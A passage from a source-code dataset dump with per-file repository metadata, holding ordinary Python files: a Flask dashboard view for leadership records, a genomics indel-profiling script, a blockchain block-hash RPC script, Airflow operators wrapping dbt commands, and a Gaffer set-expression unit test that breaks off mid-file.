] | null | null | null | app/views/dashboard/leadership/index.py | Wern-rm/raton.by | 68f862f2bc0551bf2327e9d6352c0cde93f45301 | [
"MIT"
] | null | null | null | app/views/dashboard/leadership/index.py | Wern-rm/raton.by | 68f862f2bc0551bf2327e9d6352c0cde93f45301 | [
"MIT"
] | null | null | null | import os
from flask import render_template, redirect, url_for, request, current_app
from flask_login import login_required
from app import db, logger
from app.controllers.dashboard_controller import dashboard_controller
from app.forms.dashboard_leaderships import LeadershipsForm, LeadershipsEditForm, LeadershipsEditPhotoForm
from app.models.leaderships import Leaderships
from app.utils.flask_upload_files import UploadFiles, IMAGES
from app.views.dashboard import bp
@bp.route('/leaderships', methods=['GET', 'POST'])
@login_required
@dashboard_controller
def leaderships(**kwargs):
form = LeadershipsForm()
uploader = UploadFiles(basedir=current_app.config.get('STATIC_APP'), storage='uploads', extensions=IMAGES)
if form.validate_on_submit() and request.form['form-id'] == '1':
try:
found = db.session.query(Leaderships).filter(Leaderships.username == form.username.data).first()
if not found:
filename = uploader.save(file=form.file.data)
file_url = uploader.get_path(filename=filename)
new = Leaderships(post=form.post.data,
username=form.username.data,
url=file_url,
phone=form.phone.data,
fax=form.fax.data,
email=form.email.data)
db.session.add(new)
db.session.commit()
return redirect(url_for('dashboard.leaderships', action='success', id=26))
else:
return redirect(url_for('dashboard.leaderships', action='error', id=15))
except Exception as e:
db.session.rollback()
logger.error(e)
return redirect(url_for('dashboard.leaderships', action='error', id=16))
form_edit = LeadershipsEditForm()
if form_edit.validate_on_submit() and request.form['form-id'] == '2':
try:
leadership_id = int(request.form['leadership-id'])
found = db.session.query(Leaderships).filter(Leaderships.username == form_edit.username.data, Leaderships.id != leadership_id).first()
if not found:
db.session.query(Leaderships).filter(Leaderships.id == leadership_id).update({
'post': form_edit.post.data,
'username': form_edit.username.data,
'phone': form_edit.phone.data,
'fax': form_edit.fax.data,
'email': form_edit.email.data
})
db.session.commit()
return redirect(url_for('dashboard.leaderships', action='success', id=27))
else:
return redirect(url_for('dashboard.leaderships', action='error', id=15))
except Exception as e:
db.session.rollback()
logger.error(e)
return redirect(url_for('dashboard.leaderships', action='error', id=17))
form_edit_photo = LeadershipsEditPhotoForm()
if form_edit_photo.validate_on_submit() and request.form['form-id'] == '3':
try:
leadership_id = int(request.form['leadership-id'])
filename = uploader.save(file=form_edit_photo.file.data)
file_url = uploader.get_path(filename=filename)
old = db.session.query(Leaderships).filter(Leaderships.id == leadership_id).first()
if os.path.exists(os.path.join(current_app.config.get('STATIC_APP'), old.url)):
os.remove(os.path.join(current_app.config.get('STATIC_APP'), old.url))
db.session.query(Leaderships).filter(Leaderships.id == leadership_id).update({'url': file_url})
db.session.commit()
return redirect(url_for('dashboard.leaderships', action='success', id=28))
except Exception as e:
db.session.rollback()
logger.error(e)
return redirect(url_for('dashboard.leaderships', action='error', id=18))
kwargs['title'] = 'Управление руководителями'
kwargs['data'] = db.session.query(Leaderships).order_by(Leaderships.id).all()
kwargs['form'] = form
kwargs['form_edit'] = form_edit
kwargs['form_edit_photo'] = form_edit_photo
return render_template("dashboard/leaderships.html", **kwargs) | 50.244186 | 146 | 0.625087 |
795c5487d67b341c74212287fba5cc9ec24a5c06 | 4,747 | py | Python | indel_analysis/endogenous_comparisons/compute_overbeek_indel_profiles.py | kaskamal/SelfTarget | c0bff0f11f4e69bafd80a1fa4d36b0f9689b9af7 | [
"MIT"
] | 20 | 2018-08-27T01:27:02.000Z | 2022-03-07T07:12:56.000Z | indel_analysis/endogenous_comparisons/compute_overbeek_indel_profiles.py | kaskamal/SelfTarget | c0bff0f11f4e69bafd80a1fa4d36b0f9689b9af7 | [
"MIT"
] | 6 | 2019-01-18T19:54:52.000Z | 2021-03-19T23:56:28.000Z | indel_analysis/endogenous_comparisons/compute_overbeek_indel_profiles.py | kaskamal/SelfTarget | c0bff0f11f4e69bafd80a1fa4d36b0f9689b9af7 | [
"MIT"
] | 14 | 2018-10-12T21:31:31.000Z | 2021-11-08T08:32:40.000Z | import io
import sys
from Bio import SeqIO
import os
import numpy as np
import re
import csv
import Bio.Seq
from selftarget.util import getIndelMapExe
sys.path.append('../compute_indels')
from compile_mapped_null_profiles import compileMappedNull, convertToExpFile
from reformat_indel_profile import reformatIndelProfile
def loadFastqReads( filename, id, ftype='fastq'):
lookup = {}
for record in SeqIO.parse(filename,ftype):
readid = str(record.id)
if '.' not in readid:
readid = id + '.' + readid
lookup[readid] = str(record.seq)
return lookup
def fetchOrigPamAndTemplate(template_file):
f = io.open(template_file)
toks = f.readline().split()
id, pam_loc, pam_dir = toks[0][1:], eval(toks[1]), toks[2]
seq = f.readline()[:-1]
return {id.split('_')[0]: (pam_loc, pam_dir)}, seq
def filterMappings(mappings_file, output_mappings_file):
f = io.open(mappings_file)
fout = io.open(output_mappings_file, 'w')
for toks in csv.reader(f,delimiter='\t'):
if toks[0][:3] == '@@@' or toks[1] == '': continue
fout.write(u'\t'.join(toks) + '\n')
fout.close()
f.close()
def numMismatch(seq1,seq2):
return sum([x != y for (x,y) in zip(seq1,seq2)])
def trimRead( read_seq, template_seq ):
start_idx = read_seq.find(template_seq[:20])
stop_idx = read_seq.find(template_seq[-20:])
#Search with mismatches if needed
if start_idx < 0:
start_idx = read_seq.find(template_seq[:10])
if start_idx < 0 or numMismatch(template_seq[:20], read_seq[start_idx:start_idx+20]) > 2:
start_idx = read_seq.find(template_seq[10:20])-10
if start_idx < 0 or numMismatch(template_seq[:20], read_seq[start_idx:start_idx+20]) > 2:
start_idx = -1
if stop_idx < 0:
stop_idx = read_seq.find(template_seq[-10:])-10
if stop_idx < 0 or numMismatch(template_seq[-20:], read_seq[stop_idx:stop_idx+20]) > 2:
stop_idx = read_seq.find(template_seq[-20:-10])
if stop_idx < 0 or numMismatch(template_seq[-20:], read_seq[stop_idx:stop_idx+20]) > 2:
stop_idx = -1
if start_idx >= 0 and stop_idx >= 0:
return read_seq[start_idx:stop_idx+20]
return ''
def trimReadsToTemplate(fastq_file, output_fasta, template_seq, id):
fout = io.open(output_fasta, 'w')
count, total = 0, 0
for record in SeqIO.parse(fastq_file,'fastq'):
trimmed_seq = trimRead( str(record.seq), template_seq )
if trimmed_seq != '':
fout.write(u'>%s\n%s\n' % (id + '.' + str(record.id),trimmed_seq))
count += 1
total += 1
fout.close()
def computeOverbeekIndelProfiles(highdir='.', selected_id = None):
nulldir = highdir + '/overbeek_control_fastq_files'
testdir = highdir + '/overbeek_fastq_files'
for idx in range(1,97):
id = 'Overbeek%d' % idx
if selected_id is not None and id != selected_id:
continue
fastq_file = testdir + '/%s.fastq' % id
null_fastq_file = nulldir + '/%s.fastq' % id
template_file = highdir + '/overbeek_template_files/%s_template.fasta' % id
null_mappings_file = nulldir + '/%s_mappings.txt' % id
mapped_file = testdir + '/%s_mappedindels.txt' % id
#Compute the Null Profile and resulting expected templates
cmd = getIndelMapExe() + ' %s %s %s 0' % (null_fastq_file, template_file, null_mappings_file[:-4] + '_unfilt.txt')
print(cmd); os.system(cmd)
filterMappings(null_mappings_file[:-4] + '_unfilt.txt', null_mappings_file)
null_reads = loadFastqReads(null_fastq_file, id)
pam_lookup, template_seq = fetchOrigPamAndTemplate(template_file)
compileMappedNull(nulldir + '/%s' % id, null_reads, pam_lookup, {})
convertToExpFile(nulldir + '/%s_nullsummary.txt' % id, nulldir + '/%s_exptargets.txt' % id, discard_long=False)
#Compute the Indel Profile, by mapping the test reads against the null templates
trimReadsToTemplate(fastq_file, fastq_file[:-6] + '_trimmed.fasta', template_seq, id)
cmd = getIndelMapExe() + ' %s %s %s 0' % (fastq_file[:-6] + '_trimmed.fasta', nulldir + '/%s_exptargets.txt' % id, mapped_file[:-4] + '_unfilt.txt')
print(cmd); os.system(cmd)
filterMappings(mapped_file[:-4] + '_unfilt.txt', mapped_file)
reads = loadFastqReads(fastq_file[:-6] + '_trimmed.fasta', id, ftype='fasta')
reformatIndelProfile(testdir + '/%s' % id, reads)
if __name__ == '__main__':
selected_id = None
if len(sys.argv) == 2:
selected_id = sys.argv[1]
computeOverbeekIndelProfiles(selected_id=selected_id)
| 39.890756 | 156 | 0.641668 |
795c551f40c73343609e47d9cdbeef17bf38f4ae | 3,122 | py | Python | contrib/linearize/linearize-hashes.py | bitstakecore/bitstake | 026c006222ca08a7137db7772961f2462ef45d03 | [
"MIT"
] | null | null | null | contrib/linearize/linearize-hashes.py | bitstakecore/bitstake | 026c006222ca08a7137db7772961f2462ef45d03 | [
"MIT"
] | null | null | null | contrib/linearize/linearize-hashes.py | bitstakecore/bitstake | 026c006222ca08a7137db7772961f2462ef45d03 | [
"MIT"
] | null | null | null | #!/usr/bin/python
#
# linearize-hashes.py: List blocks in a linear, no-fork version of the chain.
#
# Copyright (c) 2013-2014 The Bitcoin developers
# Copyright (c) 2015-2018 The PIVX developers
# Copyright (c) 2018 The BS developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
from __future__ import print_function
import json
import struct
import re
import base64
import httplib
import sys
settings = {}
class BitcoinRPC:
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def execute(self, obj):
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print("JSON-RPC: no response", file=sys.stderr)
return None
body = resp.read()
resp_obj = json.loads(body)
return resp_obj
@staticmethod
def build_request(idx, method, params):
obj = { 'version' : '1.1',
'method' : method,
'id' : idx }
if params is None:
obj['params'] = []
else:
obj['params'] = params
return obj
@staticmethod
def response_is_error(resp_obj):
return 'error' in resp_obj and resp_obj['error'] is not None
def get_block_hashes(settings, max_blocks_per_call=10000):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpassword'])
height = settings['min_height']
while height < settings['max_height']+1:
num_blocks = min(settings['max_height']+1-height, max_blocks_per_call)
batch = []
for x in range(num_blocks):
batch.append(rpc.build_request(x, 'getblockhash', [height + x]))
reply = rpc.execute(batch)
for x,resp_obj in enumerate(reply):
if rpc.response_is_error(resp_obj):
print('JSON-RPC: error at height', height+x, ': ', resp_obj['error'], file=sys.stderr)
exit(1)
assert(resp_obj['id'] == x) # assume replies are in-sequence
print(resp_obj['result'])
height += num_blocks
if __name__ == '__main__':
if len(sys.argv) != 2:
print("Usage: linearize-hashes.py CONFIG-FILE")
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 51473
if 'min_height' not in settings:
settings['min_height'] = 0
if 'max_height' not in settings:
settings['max_height'] = 313000
if 'rpcuser' not in settings or 'rpcpassword' not in settings:
print("Missing username and/or password in cfg file", file=stderr)
sys.exit(1)
settings['port'] = int(settings['port'])
settings['min_height'] = int(settings['min_height'])
settings['max_height'] = int(settings['max_height'])
get_block_hashes(settings)
| 26.913793 | 90 | 0.684497 |
795c55357c48663324c243543889f9db66f71765 | 218 | py | Python | PyOpenWorm/data_trans/__init__.py | jaideep-seth/PyOpenWorm | c36baeda9590334ba810296934973da34f0eab78 | [
"MIT"
] | 1 | 2019-03-22T12:02:36.000Z | 2019-03-22T12:02:36.000Z | PyOpenWorm/data_trans/__init__.py | BioComSoftware/PyOpenWorm | 32084f3570b4ea7fbdb1a4d20bd469d4af6ab28f | [
"MIT"
] | 1 | 2015-05-23T19:26:57.000Z | 2015-05-26T02:04:43.000Z | PyOpenWorm/data_trans/__init__.py | BioComSoftware/PyOpenWorm | 32084f3570b4ea7fbdb1a4d20bd469d4af6ab28f | [
"MIT"
] | 1 | 2015-06-21T17:34:15.000Z | 2015-06-21T17:34:15.000Z | '''
Data translators
Some `DataSource` and `DataTranslator` types. Some deal with generic file types (e.g., comma-separated values) while
others are specific to the format of a kind of file housed in PyOpenWorm.
'''
| 27.25 | 116 | 0.756881 |
795c5537f18a2ffec5aa30a0003494b426a7d62d | 14,182 | py | Python | airflow_dbt_python/operators/dbt.py | apisarenco/airflow-dbt-python | de6ab08408b7acd3f9c6eb5ccbf32df8b1103291 | [
"MIT"
] | null | null | null | airflow_dbt_python/operators/dbt.py | apisarenco/airflow-dbt-python | de6ab08408b7acd3f9c6eb5ccbf32df8b1103291 | [
"MIT"
] | null | null | null | airflow_dbt_python/operators/dbt.py | apisarenco/airflow-dbt-python | de6ab08408b7acd3f9c6eb5ccbf32df8b1103291 | [
"MIT"
] | null | null | null | from __future__ import annotations
import datetime as dt
from dataclasses import asdict, is_dataclass
from pathlib import Path
from tempfile import NamedTemporaryFile, TemporaryDirectory
from typing import Any, Optional, Union
import dbt.flags as flags
from airflow import AirflowException
from airflow.models.baseoperator import BaseOperator
from airflow.models.xcom import XCOM_RETURN_KEY
from airflow.utils.decorators import apply_defaults
from dbt.contracts.results import RunExecutionResult, RunResult, agate
from dbt.logger import log_manager
from dbt.main import initialize_config_values, parse_args, track_run
class DbtBaseOperator(BaseOperator):
"""The basic Airflow dbt operator. Defines how to build an argument list and execute
a dbt command. Does not set a command itself, subclasses should set it.
Attributes:
command: The dbt command to execute.
project_dir: Directory for dbt to look for dbt_profile.yml. Defaults to current
directory.
profiles_dir: Directory for dbt to look for profiles.yml. Defaults to ~/.dbt.
profile: Which profile to load. Overrides dbt_profile.yml.
target: Which target to load for the given profile.
vars: Supply variables to the project. Should be a YAML string. Overrides
variables defined in dbt_profile.yml.
log_cache_events: Flag to enable logging of cache events.
bypass_cache: Flag to bypass the adapter-level cache of database state.
Methods:
execute: Executes a given dbt command.
args_list: Produce a list of arguments for a dbt command.
run_dbt_command: Runs the actual dbt command as defined by self.command.
serializable_result: Turns a dbt result into a serializable object.
"""
command: Optional[str] = None
__dbt_args__ = [
"project_dir",
"profiles_dir",
"profile",
"target",
"vars",
"log_cache_events",
"bypass_cache",
]
@apply_defaults
def __init__(
self,
project_dir: Optional[Union[str, Path]] = None,
profiles_dir: Optional[Union[str, Path]] = None,
profile: Optional[str] = None,
target: Optional[str] = None,
vars: Optional[dict[str, str]] = None,
log_cache_events: Optional[bool] = False,
bypass_cache: Optional[bool] = False,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.project_dir = project_dir
self.profiles_dir = profiles_dir
self.profile = profile
self.target = target
self.vars = vars
self.log_cache_events = log_cache_events
self.bypass_cache = bypass_cache
def execute(self, context: dict):
"""Execute dbt command with prepared arguments"""
if self.command is None:
raise AirflowException("dbt command is not defined")
args: list[Optional[str]] = [self.command]
args.extend(self.args_list())
self.log.info("Running dbt %s with args %s", args[0], args[1:])
with TemporaryDirectory(prefix="airflowtmp") as tmp_dir:
with NamedTemporaryFile(dir=tmp_dir, mode="w+") as f:
with log_manager.applicationbound():
log_manager.reset_handlers()
log_manager.set_path(tmp_dir)
# dbt logger writes to STDOUT and I haven't found a way
# to bubble up to the Airflow command logger. As a workaround,
# I set the output stream to a temporary file that is later
# read and logged using the command's logger.
log_manager.set_output_stream(f)
res, success = self.run_dbt_command(args)
with open(f.name) as read_file:
for line in read_file:
self.log.info(line.rstrip())
if self.do_xcom_push is True:
# Some dbt operations use dataclasses for its results,
# found in dbt.contracts.results. Each DbtBaseOperator
# subclass should implement prepare_results to return a
# serializable object
res = self.serializable_result(res)
if success is not True:
if self.do_xcom_push is True and context.get("ti", None) is not None:
self.xcom_push(context, key=XCOM_RETURN_KEY, value=res)
raise AirflowException(f"dbt {args[0]} {args[1:]} failed")
return res
def args_list(self) -> list[str]:
"""Build a list of arguments to pass to dbt"""
args = []
for arg in self.__dbt_args__:
value = getattr(self, arg, None)
if value is None:
continue
if arg.startswith("dbt_"):
arg = arg[4:]
if not isinstance(value, bool) or value is True:
flag = "--" + arg.replace("_", "-")
args.append(flag)
if isinstance(value, bool):
continue
elif any(isinstance(value, _type) for _type in (str, Path, int)):
args.append(str(value))
elif isinstance(value, list):
args.extend(value)
elif isinstance(value, dict):
yaml_str = (
"{"
+ ",".join("{}: {}".format(k, v) for k, v in value.items())
+ "}"
)
args.append(yaml_str)
return args
def run_dbt_command(self, args: list[Optional[str]]) -> tuple[RunResult, bool]:
"""Run a dbt command as implemented by a subclass"""
try:
parsed = parse_args(args)
except Exception as exc:
raise AirflowException("Failed to parse dbt arguments: {args}") from exc
initialize_config_values(parsed)
flags.set_from_args(parsed)
parsed.cls.pre_init_hook(parsed)
command = parsed.cls.from_args(args=parsed)
results = None
with track_run(command):
results = command.run()
success = command.interpret_results(results)
return results, success
def serializable_result(
self, result: Optional[RunExecutionResult]
) -> Optional[dict[Any, Any]]:
"""
Turn dbt's RunExecutionResult into a dict of only JSON-serializable types
Each subclas may implement this method to return a dictionary of
JSON-serializable types, the default XCom backend. If implementing
custom XCom backends, this method may be overriden.
"""
if result is None or is_dataclass(result) is False:
return result
return asdict(result, dict_factory=run_result_factory)
class DbtRunOperator(DbtBaseOperator):
"""Executes dbt run"""
command = "run"
__dbt_args__ = DbtBaseOperator.__dbt_args__ + [
"full_refresh",
"models",
"fail_fast",
"threads",
"exclude",
"selector",
"state",
"defer",
"no_defer",
]
def __init__(
self,
full_refresh: Optional[bool] = None,
models: Optional[list[str]] = None,
fail_fast: Optional[bool] = None,
threads: Optional[int] = None,
exclude: Optional[list[str]] = None,
selector: Optional[str] = None,
state: Optional[Union[str, Path]] = None,
defer: Optional[bool] = None,
no_defer: Optional[bool] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.full_refresh = full_refresh
self.models = models
self.fail_fast = fail_fast
self.threads = threads
self.exclude = exclude
self.selector = selector
self.state = state
self.defer = defer
self.no_defer = no_defer
class DbtSeedOperator(DbtBaseOperator):
"""Executes dbt seed"""
command = "seed"
__dbt_args__ = DbtBaseOperator.__dbt_args__ + [
"full_refresh",
"select",
"show",
"threads",
"exclude",
"selector",
"state",
]
def __init__(
self,
full_refresh: Optional[bool] = None,
select: Optional[list[str]] = None,
show: Optional[bool] = None,
threads: Optional[int] = None,
exclude: Optional[list[str]] = None,
selector: Optional[str] = None,
state: Optional[Union[str, Path]] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.full_refresh = full_refresh
self.select = select
self.show = show
self.threads = threads
self.exclude = exclude
self.selector = selector
self.state = state
class DbtTestOperator(DbtBaseOperator):
"""Executes dbt test"""
command = "test"
__dbt_args__ = DbtBaseOperator.__dbt_args__ + [
"data",
"schema",
"fail_fast",
"models",
"threads",
"exclude",
"selector",
"state",
"defer",
"no_defer",
]
def __init__(
self,
data: Optional[bool] = None,
schema: Optional[bool] = None,
models: Optional[list[str]] = None,
fail_fast: Optional[bool] = None,
threads: Optional[int] = None,
exclude: Optional[list[str]] = None,
selector: Optional[str] = None,
state: Optional[Union[str, Path]] = None,
defer: Optional[bool] = None,
no_defer: Optional[bool] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.data = data
self.schema = schema
self.models = models
self.fail_fast = fail_fast
self.threads = threads
self.exclude = exclude
self.selector = selector
self.state = state
self.defer = defer
self.no_defer = no_defer
class DbtCompileOperator(DbtBaseOperator):
"""Executes dbt compile"""
command = "compile"
__dbt_args__ = DbtBaseOperator.__dbt_args__ + [
"parse_only",
"full_refresh",
"fail_fast",
"threads",
"models",
"exclude",
"selector",
"state",
]
def __init__(
self,
parse_only: Optional[bool] = None,
full_refresh: Optional[bool] = None,
models: Optional[list[str]] = None,
fail_fast: Optional[bool] = None,
threads: Optional[int] = None,
exclude: Optional[list[str]] = None,
selector: Optional[str] = None,
state: Optional[Union[str, Path]] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.parse_only = parse_only
self.full_refresh = full_refresh
self.models = models
self.fail_fast = fail_fast
self.threads = threads
self.exclude = exclude
self.selector = selector
self.state = state
class DbtDepsOperator(DbtBaseOperator):
"""Executes dbt deps"""
command = "deps"
def __init__(self, **kwargs) -> None:
super().__init__(**kwargs)
class DbtCleanOperator(DbtBaseOperator):
"""Executes dbt clean"""
command = "clean"
def __init__(self, **kwargs) -> None:
super().__init__(**kwargs)
class DbtDebugOperator(DbtBaseOperator):
"""Execute dbt debug"""
command = "debug"
__dbt_args__ = DbtBaseOperator.__dbt_args__ + ["config_dir", "no_version_check"]
def __init__(
self,
config_dir: Optional[bool] = None,
no_version_check: Optional[bool] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.config_dir = config_dir
self.no_version_check = no_version_check
class DbtSnapshotOperator(DbtBaseOperator):
"""Execute dbt snapshot"""
command = "snapshot"
__dbt_args__ = DbtBaseOperator.__dbt_args__ + [
"select",
"threads",
"exclude",
"selector",
"state",
]
def __init__(
self,
select: Optional[list[str]] = None,
threads: Optional[int] = None,
exclude: Optional[list[str]] = None,
selector: Optional[str] = None,
state: Optional[Union[str, Path]] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.select = select
self.threads = threads
self.exclude = exclude
self.selector = selector
self.state = state
class DbtLsOperator(DbtBaseOperator):
"""Execute dbt list (or ls)"""
command = "ls"
__dbt_args__ = DbtBaseOperator.__dbt_args__ + [
"resource_type",
"select",
"models",
"exclude",
"selector",
"dbt_output",
]
def __init__(
self,
resource_type: Optional[list[str]] = None,
select: Optional[list[str]] = None,
models: Optional[list[str]] = None,
exclude: Optional[list[str]] = None,
selector: Optional[str] = None,
dbt_output: Optional[str] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.resource_type = resource_type
self.select = select
self.models = models
self.exclude = exclude
self.selector = selector
self.dbt_output = dbt_output
# Convinience alias
DbtListOperator = DbtLsOperator
def run_result_factory(data: list[tuple[Any, Any]]):
"""
We need to handle dt.datetime and agate.table.Table.
The rest of the types should already be JSON-serializable.
"""
d = {}
for key, val in data:
if isinstance(val, dt.datetime):
val = val.isoformat()
elif isinstance(val, agate.table.Table):
# agate Tables have a few print methods but they offer plain
# text representations of the table which are not very JSON
# friendly. There is a to_json method, but I don't think
# sending the whole table in an XCOM is a good idea either.
val = {
k: v.__class__.__name__
for k, v in zip(val._column_names, val._column_types)
}
d[key] = val
return d
| 30.63067 | 88 | 0.590396 |
795c55fbef1712060b8c3014d53d8d0e07fb77d6 | 7,913 | py | Python | python/GafferSceneTest/SetAlgoTest.py | ivanimanishi/gaffer | 7cfd79d2f20c25ed1d680730de9d6a2ee356dd4c | [
"BSD-3-Clause"
] | 1 | 2019-08-02T16:49:59.000Z | 2019-08-02T16:49:59.000Z | python/GafferSceneTest/SetAlgoTest.py | rkoschmitzky/gaffer | ec6262ae1292767bdeb9520d1447d65a4a511884 | [
"BSD-3-Clause"
] | 2 | 2017-08-23T21:35:45.000Z | 2018-01-29T08:59:33.000Z | python/GafferSceneTest/SetAlgoTest.py | rkoschmitzky/gaffer | ec6262ae1292767bdeb9520d1447d65a4a511884 | [
"BSD-3-Clause"
] | 1 | 2020-12-21T12:33:49.000Z | 2020-12-21T12:33:49.000Z | ##########################################################################
#
# Copyright (c) 2017, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import functools
import IECore
import GafferScene
import GafferSceneTest
class SetAlgoTest( GafferSceneTest.SceneTestCase ) :
def test( self ) :
sphere1 = GafferScene.Sphere( "Sphere1" )
sphere1["name"].setValue( 'sphere1' )
sphere2 = GafferScene.Sphere( "Sphere2" )
sphere2["name"].setValue( 'sphere2' )
sphere3 = GafferScene.Sphere( "Sphere3" )
sphere3["name"].setValue( 'sphere3' )
group1 = GafferScene.Group( "Group1" )
group1["in"].addChild( GafferScene.ScenePlug( "in1" ) )
group1["in"].addChild( GafferScene.ScenePlug( "in2" ) )
group1["in"]["in0"].setInput( sphere1["out"] )
group1["in"]["in1"].setInput( sphere2["out"] )
setA = GafferScene.Set( "SetA" )
setA["name"].setValue( 'setA' )
setA["paths"].setValue( IECore.StringVectorData( [ '/group/sphere1', '/group/sphere2' ] ) )
setB = GafferScene.Set( "SetB" )
setB["name"].setValue( 'setB' )
setB["paths"].setValue( IECore.StringVectorData( [ '/group/sphere2' ] ) )
setC = GafferScene.Set( "SetC" )
setC["name"].setValue( 'setC' )
setC["paths"].setValue( IECore.StringVectorData( [ '/sphere3' ] ) )
setD = GafferScene.Set( "SetD" )
setD["name"].setValue( 'setD' )
setD["paths"].setValue( IECore.StringVectorData( [] ) )
group2 = GafferScene.Group( "Group2" )
group2["in"].addChild( GafferScene.ScenePlug( "in1" ) )
group2["in"].addChild( GafferScene.ScenePlug( "in2" ) )
group2["in"].addChild( GafferScene.ScenePlug( "in3" ) )
setA["in"].setInput( group1["out"] )
setB["in"].setInput( setA["out"] )
setC["in"].setInput( sphere3["out"] )
setD["in"].setInput( setC["out"] )
group2["in"]["in0"].setInput( setB["out"] )
group2["in"]["in2"].setInput( setD["out"] )
# Set memberships:
# A: ( /group/group/sphere1, /group/group/sphere2 )
# B: ( /group/group/sphere2 )
# C: ( /group/sphere3 )
# D: ( )
expressionCheck = functools.partial( self.assertCorrectEvaluation, group2["out"] )
expressionCheck( '', [] )
expressionCheck( 'setA', [ '/group/group/sphere1', '/group/group/sphere2' ] )
expressionCheck( '/group/sphere3', [ '/group/sphere3' ] )
# Test expressions that contain only sets and have a clearly defined evaluation order
expressionCheck( '(setA | setC)', [ '/group/group/sphere1', '/group/group/sphere2', '/group/sphere3' ] )
expressionCheck( '(setA | setB)', [ '/group/group/sphere1', '/group/group/sphere2' ] )
expressionCheck( '(setA & setB)', [ '/group/group/sphere2' ] )
expressionCheck( '(setA & setC)', [] )
expressionCheck( '(setA | setB) & setD', [] )
expressionCheck( '(setA & setB) | setD', [ '/group/group/sphere2' ] )
expressionCheck( '(setA - setB)', [ '/group/group/sphere1' ] )
expressionCheck( '(setA - setC)', [ '/group/group/sphere1', '/group/group/sphere2'] )
expressionCheck( '(setB - setC)', [ '/group/group/sphere2' ] )
# Test expressions that omit the explicit grouping and rely on operator precedence
expressionCheck( 'setA setC', [ '/group/group/sphere1', '/group/group/sphere2', '/group/sphere3' ] )
expressionCheck( 'setA | setB | setC', [ '/group/group/sphere1', '/group/group/sphere2', '/group/sphere3' ] )
expressionCheck( 'setA | setB & setC', [ '/group/group/sphere1', '/group/group/sphere2' ] )
expressionCheck( 'setA & setB | setC', [ '/group/group/sphere2', '/group/sphere3' ] )
expressionCheck( 'setA & setB - setC', [ '/group/group/sphere2' ] )
expressionCheck( 'setA - setB | setC', [ '/group/group/sphere1', '/group/sphere3' ] )
# Test more complex expressions that contain explicit object names and lists thereof
expressionCheck( '/group/light1 /group/light2', [ '/group/light1', '/group/light2' ] )
expressionCheck( '(/group/light1 /group/light2)', [ '/group/light1', '/group/light2' ] )
expressionCheck( '/group/light1 /group/light2 setA', [ '/group/light1', '/group/light2', '/group/group/sphere1', '/group/group/sphere2' ] )
expressionCheck( '(/group/light1 /group/light2) | setA', [ '/group/light1', '/group/light2', '/group/group/sphere1', '/group/group/sphere2' ] )
expressionCheck( 'setA & (/group/group/sphere1 /group/group/sphere42)', [ '/group/group/sphere1' ] )
expressionCheck( 'setA - /group/group/sphere2', [ '/group/group/sphere1' ] )
expressionCheck( '(setA - /group/group/sphere2)', [ '/group/group/sphere1' ] )
expressionCheck( 'setA - ((setC /group/group/sphere2) & setB)', [ '/group/group/sphere1' ] )
expressionCheck( '(setA - ((setC /group/group/sphere2) & setB))', [ '/group/group/sphere1' ] )
expressionCheck( 'setA - (/group/group/sphere1 /group/group/sphere2) | (setA setB setC) & setC', [ '/group/sphere3' ] )
# Test if proper exception is thrown for invalid expression
with self.assertRaises( RuntimeError ) as e :
# note the missing )
GafferScene.SetAlgo.evaluateSetExpression( 'setA - (/group/group/sphere2', group2["out"] )
self.assertEqual( str( e.exception ), 'Exception : Syntax error in indicated part of SetExpression.\nsetA - (/group/group/sphere2\n |---------------------|\n.' )
# Sets that don't exist should be replaced with an empty PathMatcher
expressionCheck( 'A', [] )
# Test that changing set contents will result in an updated hash
h = GafferScene.SetAlgo.setExpressionHash( "setA", group2["out"] )
setA["paths"].setValue( IECore.StringVectorData( [ '/group/sphere1' ] ) )
